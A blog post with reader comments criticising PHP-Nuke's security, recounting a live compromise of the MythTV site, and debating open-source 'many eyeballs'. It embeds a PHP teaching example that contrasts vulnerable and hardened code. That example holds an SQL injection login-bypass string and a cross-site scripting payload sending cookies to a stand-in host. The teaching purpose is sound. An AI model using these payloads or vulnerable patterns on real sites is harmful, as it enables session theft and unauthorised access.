Of course, he's right. I've been on Bugtraq long enough to realize
that the popular PHP-based boards and community systems seem to get
compromised in some way or another (SQL injection, cross-site
scripting, etc.) on a very regular basis. That's part of the reason I
asked in the first place. I was hoping someone who knows more about
the scene would enlighten me. And, despite the fact that I omitted
security from my original list of requirements, it worked
nicely.

Then, yesterday, I was looking at the MythTV project, which is an
impressive Linux PVR solution (think "Open Tivo"). Literally as I
was browsing the site someone compromised it. See the screenshot
at the right? I took that just in case it was fixed before I had a
chance to write this. Indeed, a couple of hours later the site was back
to normal.

Witnessing this real-time "hacking" is a sobering example of how
far things have to come. If you've been brainwashed by Eric Raymond's
"given enough eyeballs, all bugs are shallow" logic, ask yourself why we keep seeing this
sort of thing happen with popular Open Source Software such as
PHP-Nuke.
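The two bug classes named above, SQL injection and cross-site scripting, in the shape they typically took in PHP community software, each shown next to a hardened version. This is an added example written for this page; it is not code from the post, from PHP-Nuke, MythTV, or any other project mentioned here. It assumes the PDO SQLite extension is available (an in-memory database is used so it runs offline); the `users` table, the function names, and the attacker inputs are all constructed for the illustration.

```php
<?php
// Added example, not from the original page or any of the projects it names.
// Shows a string-built login query and an unescaped echo, the two PHP patterns
// behind most of the Bugtraq traffic the post refers to, beside hardened forms.
// Assumption: pdo_sqlite is installed. Table and inputs are constructed here.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass TEXT)');
$db->exec("INSERT INTO users (name, pass) VALUES ('alice', 's3cret'), ('bob', 'hunter2')");

// 1. SQL injection: the classic string-built login check.
function loginVulnerable(PDO $db, string $user, string $pass): int {
    // Untrusted input is spliced straight into the SQL text, so a quote in
    // the input changes the structure of the query, not just its data.
    $sql = "SELECT COUNT(*) FROM users WHERE name = '$user' AND pass = '$pass'";
    return (int) $db->query($sql)->fetchColumn();
}

// Hardened: prepared statement; the input is bound as data and never
// reaches the SQL parser as code.
function loginHardened(PDO $db, string $user, string $pass): int {
    $stmt = $db->prepare('SELECT COUNT(*) FROM users WHERE name = ? AND pass = ?');
    $stmt->execute([$user, $pass]);
    return (int) $stmt->fetchColumn();
}

// Constructed attacker input: closes the string literal and short-circuits
// the password check, so the query becomes
//   ... AND pass = '' OR '1'='1'
$user = 'alice';
$pass = "' OR '1'='1";

$v = loginVulnerable($db, $user, $pass);   // 2 rows match: every user
$h = loginHardened($db, $user, $pass);     // 0 rows match
printf("vulnerable: %d row(s) match -> login %s\n", $v, $v ? 'GRANTED' : 'denied');
printf("hardened:   %d row(s) match -> login %s\n", $h, $h ? 'GRANTED' : 'denied');

// 2. Cross-site scripting: echoing a request parameter into HTML.
function greetVulnerable(string $name): string {
    // Whatever arrived in the request is emitted as markup.
    return "<p>Welcome back, $name!</p>";
}

// Hardened: escape for the HTML context at the point of output.
function greetHardened(string $name): string {
    return '<p>Welcome back, '
        . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '!</p>';
}

// Constructed attacker input, as it would arrive in $_GET['name'].
$name = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

echo "vulnerable: " . greetVulnerable($name) . "\n";   // script tag emitted verbatim
echo "hardened:   " . greetHardened($name) . "\n";     // &lt;script&gt;... rendered as text
```

The fix in both cases is the same idea: keep untrusted input as data by using the interface that separates it from code (parameter binding for SQL, context-aware escaping for HTML) rather than trying to filter "bad" characters on the way in.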

These systems need to be made so that they can be patched more easily. Offering up a new tgzball is not going to cut it. "Oh hey, an update ... I'll just unpack this and ... hey, where is my config? AAAAARRRRRRRRRRRGH!"

Sure, admins need to have more clue than this...but we all know better at this point. Even trivial Apple and Microsoft updates, with the exception of a button click, download and install themselves. In most cases...

PHPNuke is a poor example of an Open Source project. The author is a really poor coder (Nuke was a learning project), and he is loath to accept suggestions from people. When I first started using Nuke I submitted a couple of patches which all went completely ignored.

When my site got hacked through a really stupid piece of code, I stopped using Nuke and haven't looked back since.

If you're looking for a Nuke like piece of software, there are several splinter projects such as Post-Nuke that are more open and have a Clue.

Insecure software is insecure software, no matter how you look at it -- and no matter whether it is proprietary or free.

I believe the many-eyeballs paradigm has worked very well in this case, since everybody knows PHP-Nuke (and actually most people's home PHP projects, since the language doesn't help you with web site security at all) sucks badly because it has been up on Bugtraq / F.D. lots of times. Just as I hope nobody does new installations of Sendmail and friends now. (I am surprised to see very few have ditched OpenSSH/SSL given its security history.)

If there are security bugs found in a package you use and you have a nagging feeling there might be more of them, just ditch it!

I think we need to leave some room for where ESR's shallow bug thinking may be correct, or at least not entirely wrong, on this.

To wit: PN Sucks. But Drupal doesn't suck. Drupal doesn't suck because people _read the code_ in PN (painful as it was to do so) and said "we can make this much, much, much better", forked it, and proceeded to do so.

I was browsing The Devil's Dictionary (http://www.eod.com/devil/) a while back just as the site admin accidentally did a recursive rm on the website itself. He replaced the front page with the following:

Nobody mentioned XOOPS, why? Not that I am affiliated or anything, but they seem to have some interest in security. Then again, I could say this is a Drupal promo page :P
p.s. I have nothing against any of them

on May 13, 2007 07:51 AM
